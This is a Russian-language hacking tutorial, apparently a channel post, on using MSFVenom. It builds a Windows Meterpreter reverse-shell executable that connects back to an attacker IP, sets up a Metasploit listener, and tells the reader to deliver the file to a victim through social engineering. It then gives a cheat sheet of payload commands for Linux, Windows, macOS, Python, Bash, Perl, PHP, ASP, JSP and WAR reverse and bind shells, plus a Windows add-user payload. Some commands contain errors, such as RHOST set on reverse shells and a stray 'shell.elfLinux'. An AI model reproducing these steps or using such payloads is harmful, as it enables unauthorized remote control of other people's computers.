Как использовать MSFVenom

Как использовать MSFVenom

Life-Hack [Жизнь-Взлом]/Хакинг

#Обучение

В сегодняшней статье я покажу, как использовать MSFVenom. Вы узнаете, как создать полезную нагрузку (Payload) в MSFVenom. Также, приведу список всех команд MSFVenom.

Что такое MSFVenom 

MSFVenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, двоюродный брат Metasploit. С его помощью вы можете создавать различные полезные нагрузки, шелл-код и обратный шелл. 

В далеком 2015 году он заменил инструменты MSFPayload и MSFEncode.

В новой версии MSFVenom появилась справка. Чтобы отобразить справку введите: 

msfvenom -h

Как использовать MSFVenom 

Reverse TCP (обратное подключение, обратный шелл, пейлоад), — схема взаимодействия с целевым компьютером. Говоря простым языком. Мы создаем вредоносный файл (полезную нагрузку), после запуска которого целевой компьютер будет пытаться подключиться к нашему компьютеру. Это называется «бэкконнект» или в нашем случае обратный шелл, потому что «бэкконнект» — это понятие растяжимое. 

Чтобы узнать, какие полезные нагрузки доступны введите команду: 

msf5> msfvenom -l payloads

Следующая команда создаст вредоносный исполняемый файл (обратный шелл), после запуска которого откроется сеанс Meterpreter. 

  • LHOST — IP-адрес вашего компьютера (атакующего).
  • LPORT — порт вашего компьютера, который назначен серверу или программе.
  • P — сокращение от «payload», полезная нагрузка для выбранной платформы.
  • F — параметр, который задает тип файла, например, exe для Windows. 
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/infoecaddicts.exe

Полезная нагрузка готова:

Мы создали пэйлоад, теперь переходим к следующему этапу. Запускаем msfconsole и вводим команды: 

msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.13
msf> set LPORT 4444
msf> run 

Необходимо ввести те же данные (IP-адрес и порт), которые были использованы при создании обратного шелла. 

Этой операцией мы позволяем принять подключение от созданного нами ранее обратного шелла, который запустит жертва.

После создания вредоносного файла необходимо отправить его жертве. Вы можете использовать методы социальной инженерии или любой другой способ доставки вредоносного файла. 

После запуска созданного файла откроется сессия Meterpreter:

Поздравляю, вы получили доступ к компьютеру. 

Команды MSFVenom 

При использовании MSFVenom всегда должна быть под рукой шпаргалка по командам: 

Meterpreter reverse shell x86 multi stage 

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elfLinux 

Linux Meterpreter bind shell x86 multi stage 

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 

Linux bind shell x64 single stage 

msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 

Linux reverse shell x64 single stage 

msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf 

Windows Meterpreter reverse shell 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 

Windows Meterpreter bind shell 

msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe 

Windows CMD Multi Stage 

msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 

Windows CMD Single Stage 

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe 

Windows add user 

msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe 

Mac Reverse Shell 

msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.macho 

Mac Bind shell 

msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.macho 

Python Shell 

msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py 

BASH Shell 

msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh 

PERL Shell 

msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl 

ASP Meterpreter shell 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp 

JSP Shell 

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp 

WAR Shell 

msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war 

PHP Reverse Shell 

msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php 

Мы создали полезную нагрузку для Windows, но мы можем создать пейлоад для любой другой операционной системы, например: Android, iOS, Liniux и т. д. Все это позволяет сделать MSFVenom. 

На этом все. Теперь вы знаете, как использовать MSFVenom.

Источник


Report Page